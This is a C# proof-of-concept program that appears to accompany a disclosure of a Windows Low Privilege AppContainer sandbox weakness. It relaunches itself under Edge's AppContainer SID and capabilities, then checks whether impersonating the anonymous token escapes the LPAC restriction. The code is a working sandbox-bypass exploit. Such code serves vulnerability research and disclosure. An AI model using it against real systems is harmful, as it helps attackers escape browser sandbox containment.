﻿using NtApiDotNet;
using SandboxAnalysisUtils;
using System;
using System.Reflection;
using System.Windows.Forms;

namespace PoC
{
    static class Program
    {
        static NtToken GetProcessToken()
        {
            return NtProcess.Current.OpenToken();
        }

        static bool IsAppContainer()
        {
            using (NtToken token = GetProcessToken())
            {
                return token.AppContainer;
            }
        }
        
        static void FixAssemblyPerms(Assembly asm, Sid ac_sid)
        {
            using (NtFile file = NtFile.Open(NtFileUtils.DosFileNameToNt(asm.Location), 
                null, FileAccessRights.ReadControl | FileAccessRights.WriteDac, FileShareMode.Read, FileOpenOptions.NonDirectoryFile))
            {
                bool found_ac = false;

                var sd = file.SecurityDescriptor;
                foreach (var ace in sd.Dacl)
                {
                    if (ace.Sid == ac_sid)
                    {
                        found_ac = true;
                    }
                }
                if (!found_ac)
                {
                    sd.Dacl.AddAccessAllowedAce(FileAccessRights.GenericAll, ac_sid);
                    sd.Dacl = sd.Dacl.Canonicalize();
                    file.SetSecurityDescriptor(sd, SecurityInformation.Dacl);
                }
            }
        }

        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main(string[] args)
        {
            try
            {
                if (IsAppContainer())
                {
                    using (NtToken proc_token = GetProcessToken())
                    {
                        if (!proc_token.LowPrivilegeAppContainer)
                        {
                            throw new Exception("Current process is not running as LPAC");
                        }

                        bool lpac = true;

                        using (NtThread.Current.ImpersonateAnonymousToken())
                        {
                            using (NtToken anon_token = NtToken.OpenThreadToken(NtThread.Current, false, false))
                            {
                                lpac = anon_token.LowPrivilegeAppContainer;
                            }
                        }

                        if (lpac)
                        {
                            throw new Exception("Impersonated LPAC Anonymous Token");
                        }
                        MessageBox.Show("Impersonated Non-LPAC Anonymous Token", "Success", MessageBoxButtons.OK, MessageBoxIcon.Information);
                    }
                }
                else
                {
                    Sid ac_sid = TokenUtils.DerivePackageSidFromName("microsoft.microsoftedge_8wekyb3d8bbwe");
                    // Ensure all the assemblies can be accessed from the AC.
                    FixAssemblyPerms(typeof(Program).Assembly, ac_sid);
                    FixAssemblyPerms(typeof(NtFile).Assembly, ac_sid);
                    FixAssemblyPerms(typeof(Win32Process).Assembly, ac_sid);

                    Win32ProcessConfig config = new Win32ProcessConfig
                    {
                        CommandLine = typeof(Program).Assembly.Location,
                        AppContainerSid = ac_sid
                    };

                    // This is a typical list of capability sids taken from MicrosoftEdgeCP.exe
                    config.Capabilities.Add(new Sid("S-1-15-3-1"));
                    config.Capabilities.Add(new Sid("S-1-15-3-9"));
                    config.Capabilities.Add(new Sid("S-1-15-3-3215430884-1339816292-89257616-1145831019"));
                    config.Capabilities.Add(new Sid("S-1-15-3-787448254-1207972858-3558633622-1059886964"));
                    config.Capabilities.Add(new Sid("S-1-15-3-3845273463-1331427702-1186551195-1148109977"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-3623855041-1826999956-3747069818-3525260223-3747374510-1746272624-950601168-56556331"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-1502825166-1963708345-2616377461-2562897074-4192028372-3968301570-1997628692-1435953622"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-3203351429-2120443784-2872670797-1918958302-2829055647-4275794519-765664414-2751773334"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-1788129303-2183208577-3999474272-3147359985-1757322193-3815756386-151582180-1888101193"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-126078593-3658686728-1984883306-821399696-3684079960-564038680-3414880098-3435825201"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-1692970155-4054893335-185714091-3362601943-3526593181-1159816984-2199008581-497492991"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-220022770-701261984-3991292956-4208751020-2918293058-3396419331-1700932348-2078364891"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-528118966-3876874398-709513571-1907873084-3598227634-3698730060-278077788-3990600205"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-1864111754-776273317-3666925027-2523908081-3792458206-3582472437-4114419977-1582884857"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-2922296261-1647482768-2017091146-3858667068-4135663662-2931985894-1627820925-818366431"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-4092130000-472000003-1670882671-259370826-3862510858-3415016346-1868891083-3396446831"));
                    config.Capabilities.Add(new Sid("S-1-15-3-1024-2440306377-3304611049-1494399071-1161926223-163912384-1437065773-1456820560-2390158196"));
                    config.Capabilities.Add(new Sid("S-1-15-3-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194"));
                    config.LowPrivilegeAppContainer = true;

                    using (var process = Win32Process.CreateProcess(config))
                    {
                        process.Process.Wait();
                        int status = process.Process.ExitStatus;
                        if (status != 0)
                        {
                            MessageBox.Show(String.Format("Non-Zero Exit Code {0}", status), 
                                "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
        }
    }
}
